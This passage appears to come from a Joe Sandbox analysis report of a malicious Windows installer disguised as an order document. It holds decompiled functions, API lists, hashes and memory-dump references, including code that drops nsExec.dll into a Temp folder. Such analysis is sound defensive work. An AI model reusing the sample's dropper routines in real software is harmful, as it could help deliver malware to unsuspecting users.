							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}











                                                0x100024b3
                                                0x100024b5
                                                0x100024c4
                                                0x100024ca
                                                0x100024d7
                                                0x100024d9
                                                0x100024dd
                                                0x100024dd
                                                0x100024e5
                                                0x100024eb
                                                0x100024ed
                                                0x00000000
                                                0x100024f4
                                                0x00000000
                                                0x00000000
                                                0x100024fa
                                                0x00000000
                                                0x00000000
                                                0x10002504
                                                0x00000000
                                                0x00000000
                                                0x1000250b
                                                0x10002511
                                                0x1000251d
                                                0x10002523
                                                0x10002528
                                                0x00000000
                                                0x00000000
                                                0x1000254a
                                                0x00000000
                                                0x00000000
                                                0x10002530
                                                0x10002536
                                                0x10002537
                                                0x10002539
                                                0x00000000
                                                0x00000000
                                                0x10002552
                                                0x10002554
                                                0x10002556
                                                0x10002558
                                                0x10002558
                                                0x00000000
                                                0x00000000
                                                0x100024ed
                                                0x1000255b
                                                0x1000255b
                                                0x10002560
                                                0x10002572
                                                0x10002572
                                                0x10002578
                                                0x1000257d
                                                0x10002582
                                                0x1000258e
                                                0x10002593
                                                0x00000000
                                                0x10002598
                                                0x10002584
                                                0x10002585
                                                0x10002599
                                                0x10002599
                                                0x10002582
                                                0x1000259a
                                                0x1000259e
                                                0x100025a1
                                                0x100025b8

                                                APIs
                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                • GlobalFree.KERNEL32 ref: 10002572
                                                • GlobalFree.KERNEL32 ref: 100025AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E00402840(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x48)) = 0xfffffd66;
				_t50 = E00402BBF(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405A5D(_t50) == 0) {
					E00402BBF(0xffffffed);
				}
				E00405BE2(_t50);
				_t26 = E00405C07(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x7a8a54;
					 *(_t56 - 8) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403235(_t45);
						E0040321F(_t49,  *(_t56 - 8));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x24));
						 *(_t56 - 0x34) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x24));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x28)));
							E00403027();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x4c) =  *_t54;
								E00405BC2( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x4c);
							}
							GlobalFree( *(_t56 - 0x34));
						}
						E00405CB9( *(_t56 + 8), _t49,  *(_t56 - 8));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0x48)) = E00403027();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x48)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                0x00402840
                                                0x00402842
                                                0x0040284e
                                                0x00402851
                                                0x0040285b
                                                0x0040285f
                                                0x0040285f
                                                0x00402865
                                                0x00402872
                                                0x0040287a
                                                0x0040287d
                                                0x00402883
                                                0x00402891
                                                0x00402896
                                                0x0040289a
                                                0x0040289d
                                                0x004028a6
                                                0x004028b2
                                                0x004028b6
                                                0x004028b9
                                                0x004028bb
                                                0x004028be
                                                0x004028bf
                                                0x004028c0
                                                0x004028c3
                                                0x004028e2
                                                0x004028ca
                                                0x004028cf
                                                0x004028d7
                                                0x004028da
                                                0x004028df
                                                0x004028df
                                                0x004028e9
                                                0x004028e9
                                                0x004028f6
                                                0x004028fc
                                                0x00402902
                                                0x00402903
                                                0x00402904
                                                0x00402907
                                                0x0040290e
                                                0x0040290e
                                                0x00402914
                                                0x00402914
                                                0x0040291f
                                                0x00402920
                                                0x00402924
                                                0x00402928
                                                0x0040292e
                                                0x0040292e
                                                0x00402935
                                                0x004021dc
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                • GlobalFree.KERNEL32 ref: 004028E9
                                                • GlobalFree.KERNEL32 ref: 004028FC
                                                • CloseHandle.KERNEL32(?), ref: 00402914
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 598869ac1d0c0d8c1f48ea91ef13a2e3ea5b07d01dc90d54694cccaa19b6dd20
                                                • Instruction ID: a3a02304b7bf1fff1c024f37f895186886f0ecb363175dbf1b7b9d1a7e5804fa
                                                • Opcode Fuzzy Hash: 598869ac1d0c0d8c1f48ea91ef13a2e3ea5b07d01dc90d54694cccaa19b6dd20
                                                • Instruction Fuzzy Hash: 3221A072800114BBDF216FA5CE49D9E7E79EF09324F24423AF550762E1CB795E41CB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 88%
                                                			E00402537(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t13;
				int _t16;
				int _t23;
				signed int _t28;
				intOrPtr* _t31;
				void* _t33;
				void* _t34;
				void* _t37;
				signed int _t39;

				_t31 = __esi;
				_t23 = __ebx;
				_t13 =  *(_t34 - 0x24);
				_t37 = __edx - 0x38;
				 *(_t34 - 0x34) = _t13;
				_t26 = 0 | _t37 == 0x00000000;
				_t28 = _t37 == 0;
				if(_t13 == __ebx) {
					if(__edx != 0x38) {
						_t16 = lstrlenW(E00402BBF(0x11)) + _t15;
					} else {
						E00402BBF(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp", 0xffffffff, "C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll", 0x400, __ebx, __ebx);
						_t16 = lstrlenA("C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll");
					}
				} else {
					E00402BA2(1);
					 *0x40adc8 = __ax;
				}
				 *(_t34 + 8) = _t16;
				if( *_t31 == _t23) {
					L13:
					 *((intOrPtr*)(_t34 - 4)) = 1;
				} else {
					_t33 = E00405F92(_t26, _t31);
					if((_t28 |  *(_t34 - 0x34)) != 0 ||  *((intOrPtr*)(_t34 - 0x20)) == _t23 || E00405CE8(_t33, _t33) >= 0) {
						_t13 = E00405CB9(_t33, "C:\Users\FRONTD~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll",  *(_t34 + 8));
						_t39 = _t13;
						if(_t39 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t34 - 4));
				return 0;
			}












                                                0x00402537
                                                0x00402537
                                                0x00402537
                                                0x0040253c
                                                0x0040253f
                                                0x00402542
                                                0x00402547
                                                0x00402549
                                                0x00402565
                                                0x004025a3
                                                0x00402567
                                                0x00402569
                                                0x00402583
                                                0x0040258e
                                                0x0040258e
                                                0x0040254b
                                                0x0040254d
                                                0x00402552
                                                0x0040255f
                                                0x004025a8
                                                0x004025ab
                                                0x0040281e
                                                0x0040281e
                                                0x004025b1
                                                0x004025ba
                                                0x004025bc
                                                0x004025db
                                                0x004015ac
                                                0x004015ae
                                                0x00000000
                                                0x004015b4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004025bc
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
                                                • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWidelstrlen
                                                • String ID: C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp$C:\Users\user~1\AppData\Local\Temp\nsq5B3B.tmp\nsExec.dll
                                                • API String ID: 3109718747-3613577620
                                                • Opcode ID: 0cfac67b0bc91c88d3b6eabad01ed5c174bf69e0857470ad85ca214ab4ad8ec8
                                                • Instruction ID: a78273f1e820df777bc5fa4653ad4ee3f77bb41165bb33dae94d39b2abea877a
                                                • Opcode Fuzzy Hash: 0cfac67b0bc91c88d3b6eabad01ed5c174bf69e0857470ad85ca214ab4ad8ec8
                                                • Instruction Fuzzy Hash: FC110A72A41304BEDB10AFB18F4AE9E3665AF54355F60803BF501F61C1DAFC8E51466E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 007E1096 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 43%
                                                			E007E1096(void* __ecx) {
				char _v8;
				intOrPtr _t5;
				intOrPtr* _t11;

				_t11 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
				if(_t11 == 0) {
					L3:
					_t5 = 0;
				} else {
					_push( &_v8);
					_push(GetCurrentProcess());
					if( *_t11() == 0) {
						goto L3;
					} else {
						_t5 = _v8;
					}
				}
				return _t5;
			}






                                                0x007e10b2
                                                0x007e10b6
                                                0x007e10ce
                                                0x007e10ce
                                                0x007e10b8
                                                0x007e10bb
                                                0x007e10c2
                                                0x007e10c7
                                                0x00000000
                                                0x007e10c9
                                                0x007e10c9
                                                0x007e10c9
                                                0x007e10c7
                                                0x007e10d2

                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,0000003F,?,007E113F), ref: 007E10A5
                                                • GetProcAddress.KERNEL32(00000000), ref: 007E10AC
                                                • GetCurrentProcess.KERNEL32(?,?,0000003F,?,007E113F), ref: 007E10BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.512316824.00000000007E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007E0000, based on PE: true
                                                • Associated: 00000000.00000002.512304950.00000000007E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512325440.00000000007E2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512337115.00000000007E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512347213.00000000007E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7e0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: AddressCurrentHandleModuleProcProcess
                                                • String ID: IsWow64Process$kernel32
                                                • API String ID: 4190356694-3789238822
                                                • Opcode ID: 4d61e886b8cba478b6acfaee1b85eaca13a8de7865d18336bd515b83af71107a
                                                • Instruction ID: d94818db875c9212678db009598b48dd7643fe17f4e219590a51fb26e05bd122
                                                • Opcode Fuzzy Hash: 4d61e886b8cba478b6acfaee1b85eaca13a8de7865d18336bd515b83af71107a
                                                • Instruction Fuzzy Hash: AEE04F71A072D4A7CA2097A29C4ED5E7BADAA0C7553400850B901D7145EABCDB01DAA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 97%
                                                			E100018A9(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v76;
				void* _t43;
				signed int _t44;
				signed int _t59;
				void _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;
				signed int _t84;
				signed int _t86;
				signed int _t89;
				void* _t100;

				_t84 = __edx;
				 *0x1000406c = _a8;
				_t59 = 0;
				 *0x10004070 = _a16;
				_v12 = 0;
				_v8 = E10001243();
				_t89 = E10001311(_t41);
				_t86 = _t84;
				_t43 = E10001243();
				_t63 =  *_t43;
				_a8 = _t43;
				if(_t63 != 0x7e && _t63 != 0x21) {
					_a16 = E10001243();
					_t59 = E10001311(_t56);
					_v12 = _t84;
					GlobalFree(_a16);
					_t43 = _a8;
				}
				_t64 =  *_t43 & 0x0000ffff;
				_t100 = _t64 - 0x2f;
				if(_t100 > 0) {
					_t65 = _t64 - 0x3c;
					__eflags = _t65;
					if(_t65 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x3c;
						if( *((short*)(_t43 + 2)) != 0x3c) {
							__eflags = _t86 - _v12;
							if(__eflags > 0) {
								L54:
								_t44 = 0;
								__eflags = 0;
								L55:
								asm("cdq");
								L56:
								_t89 = _t44;
								L57:
								_t86 = _t84;
								L58:
								E10001470(_t84, _t89, _t86,  &_v76);
								E10001272( &_v76);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L47:
								__eflags = 0;
								L48:
								_t44 = 1;
								goto L55;
							}
							__eflags = _t89 - _t59;
							if(_t89 < _t59) {
								goto L47;
							}
							goto L54;
						}
						_t84 = _t86;
						_t44 = E10002D90(_t89, _t59, _t84);
						goto L56;
					}
					_t67 = _t65 - 1;
					__eflags = _t67;
					if(_t67 == 0) {
						__eflags = _t89 - _t59;
						if(_t89 != _t59) {
							goto L54;
						}
						__eflags = _t86 - _v12;
						if(_t86 != _v12) {
							goto L54;
						}
						goto L47;
					}
					_t68 = _t67 - 1;
					__eflags = _t68;
					if(_t68 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x3e;
						if( *((short*)(_t43 + 2)) != 0x3e) {
							__eflags = _t86 - _v12;
							if(__eflags < 0) {
								goto L54;
							}
							if(__eflags > 0) {
								goto L47;
							}
							__eflags = _t89 - _t59;
							if(_t89 <= _t59) {
								goto L54;
							}
							goto L47;
						}
						_t84 = _t86;
						_t44 = E10002DB0(_t89, _t59, _t84);
						goto L56;
					}
					_t70 = _t68 - 0x20;
					__eflags = _t70;
					if(_t70 == 0) {
						_t89 = _t89 ^ _t59;
						_t86 = _t86 ^ _v12;
						goto L58;
					}
					_t71 = _t70 - 0x1e;
					__eflags = _t71;
					if(_t71 == 0) {
						__eflags =  *((short*)(_t43 + 2)) - 0x7c;
						if( *((short*)(_t43 + 2)) != 0x7c) {
							_t89 = _t89 | _t59;
							_t86 = _t86 | _v12;
							goto L58;
						}
						__eflags = _t89 | _t86;
						if((_t89 | _t86) != 0) {
							goto L47;
						}
						__eflags = _t59 | _v12;
						if((_t59 | _v12) != 0) {
							goto L47;
						}
						goto L54;
					}
					__eflags = _t71 == 0;
					if(_t71 == 0) {
						_t89 =  !_t89;
						_t86 =  !_t86;
					}
					goto L58;
				}
				if(_t100 == 0) {
					L21:
					__eflags = _t59 | _v12;
					if((_t59 | _v12) != 0) {
						_v24 = E10002C20(_t89, _t86, _t59, _v12);
						_v20 = _t84;
						_t89 = E10002CD0(_t89, _t86, _t59, _v12);
						_t43 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t84 = _t86;
					}
					__eflags =  *_t43 - 0x2f;
					if( *_t43 != 0x2f) {
						goto L57;
					} else {
						_t89 = _v24;
						_t86 = _v20;
						goto L58;
					}
				}
				_t76 = _t64 - 0x21;
				if(_t76 == 0) {
					_t44 = 0;
					__eflags = _t89 | _t86;
					if((_t89 | _t86) != 0) {
						goto L55;
					}
					goto L48;
				}
				_t77 = _t76 - 4;
				if(_t77 == 0) {
					goto L21;
				}
				_t78 = _t77 - 1;
				if(_t78 == 0) {
					__eflags =  *((short*)(_t43 + 2)) - 0x26;
					if( *((short*)(_t43 + 2)) != 0x26) {
						_t89 = _t89 & _t59;
						_t86 = _t86 & _v12;
						goto L58;
					}
					__eflags = _t89 | _t86;
					if((_t89 | _t86) == 0) {
						goto L54;
					}
					__eflags = _t59 | _v12;
					if((_t59 | _v12) == 0) {
						goto L54;
					}
					goto L47;
				}
				_t79 = _t78 - 4;
				if(_t79 == 0) {
					_t44 = E10002BE0(_t89, _t86, _t59, _v12);
					goto L56;
				} else {
					_t80 = _t79 - 1;
					if(_t80 == 0) {
						_t89 = _t89 + _t59;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t80 == 0) {
							_t89 = _t89 - _t59;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L58;
				}
			}



























                                                0x100018a9
                                                0x100018b3
                                                0x100018bc
                                                0x100018bf
                                                0x100018c4
                                                0x100018cd
                                                0x100018d6
                                                0x100018d8
                                                0x100018da
                                                0x100018df
                                                0x100018e2
                                                0x100018e9
                                                0x100018f7
                                                0x10001900
                                                0x10001905
                                                0x10001908
                                                0x1000190e
                                                0x1000190e
                                                0x10001911
                                                0x10001914
                                                0x10001917
                                                0x100019df
                                                0x100019df
                                                0x100019e2
                                                0x10001a4d
                                                0x10001a52
                                                0x10001a61
                                                0x10001a64
                                                0x10001a6c
                                                0x10001a6c
                                                0x10001a6c
                                                0x10001a6e
                                                0x10001a6e
                                                0x10001a6f
                                                0x10001a6f
                                                0x10001a71
                                                0x10001a71
                                                0x10001a73
                                                0x10001a79
                                                0x10001a82
                                                0x10001a93
                                                0x10001a9e
                                                0x10001a9e
                                                0x10001a66
                                                0x10001a48
                                                0x10001a48
                                                0x10001a4a
                                                0x10001a4a
                                                0x00000000
                                                0x10001a4a
                                                0x10001a68
                                                0x10001a6a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001a6a
                                                0x10001a56
                                                0x10001a5a
                                                0x00000000
                                                0x10001a5a
                                                0x100019e4
                                                0x100019e4
                                                0x100019e5
                                                0x10001a3f
                                                0x10001a41
                                                0x00000000
                                                0x00000000
                                                0x10001a43
                                                0x10001a46
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001a46
                                                0x100019e7
                                                0x100019e7
                                                0x100019e8
                                                0x10001a1e
                                                0x10001a23
                                                0x10001a32
                                                0x10001a35
                                                0x00000000
                                                0x00000000
                                                0x10001a37
                                                0x00000000
                                                0x00000000
                                                0x10001a39
                                                0x10001a3b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001a3d
                                                0x10001a27
                                                0x10001a2b
                                                0x00000000
                                                0x10001a2b
                                                0x100019ea
                                                0x100019ea
                                                0x100019ed
                                                0x10001a17
                                                0x10001a19
                                                0x00000000
                                                0x10001a19
                                                0x100019ef
                                                0x100019ef
                                                0x100019f2
                                                0x100019fe
                                                0x10001a03
                                                0x10001a10
                                                0x10001a12
                                                0x00000000
                                                0x10001a12
                                                0x10001a05
                                                0x10001a07
                                                0x00000000
                                                0x00000000
                                                0x10001a09
                                                0x10001a0c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001a0e
                                                0x100019f5
                                                0x100019f6
                                                0x100019f8
                                                0x100019fa
                                                0x100019fa
                                                0x00000000
                                                0x100019f6
                                                0x1000191d
                                                0x10001996
                                                0x10001998
                                                0x1000199b
                                                0x100019b7
                                                0x100019ba
                                                0x100019c5
                                                0x100019c7
                                                0x1000199d
                                                0x1000199d
                                                0x100019a1
                                                0x100019a5
                                                0x100019a5
                                                0x100019ca
                                                0x100019ce
                                                0x00000000
                                                0x100019d4
                                                0x100019d4
                                                0x100019d7
                                                0x00000000
                                                0x100019d7
                                                0x100019ce
                                                0x1000191f
                                                0x10001922
                                                0x10001987
                                                0x10001989
                                                0x1000198b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001991
                                                0x10001924
                                                0x10001927
                                                0x00000000
                                                0x00000000
                                                0x10001929
                                                0x1000192a
                                                0x10001960
                                                0x10001965
                                                0x1000197d
                                                0x1000197f
                                                0x00000000
                                                0x1000197f
                                                0x10001967
                                                0x10001969
                                                0x00000000
                                                0x00000000
                                                0x1000196f
                                                0x10001972
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10001978
                                                0x1000192c
                                                0x1000192f
                                                0x10001956
                                                0x00000000
                                                0x10001931
                                                0x10001931
                                                0x10001932
                                                0x10001946
                                                0x10001948
                                                0x10001934
                                                0x10001936
                                                0x1000193c
                                                0x1000193e
                                                0x1000193e
                                                0x10001936
                                                0x00000000
                                                0x10001932

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: 6c55de20ad7b96facff27c14a8ebfd7daad2c96d4471c7aede05205b14c98be4
                                                • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                • Opcode Fuzzy Hash: 6c55de20ad7b96facff27c14a8ebfd7daad2c96d4471c7aede05205b14c98be4
                                                • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00401CFA() {
				void* _t18;
				struct HINSTANCE__* _t22;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0xc),  *(_t27 - 0x28));
				GetClientRect(_t25, _t27 - 0x54);
				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402BBF(_t22), _t22,  *(_t27 - 0x4c) *  *(_t27 - 0x24),  *(_t27 - 0x48) *  *(_t27 - 0x24), 0x10));
				if(_t18 != _t22) {
					DeleteObject(_t18);
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                0x00401d06
                                                0x00401d0d
                                                0x00401d3c
                                                0x00401d44
                                                0x00401d4b
                                                0x00401d4b
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • GetDlgItem.USER32 ref: 00401D00
                                                • GetClientRect.USER32 ref: 00401D0D
                                                • LoadImageW.USER32 ref: 00401D2E
                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
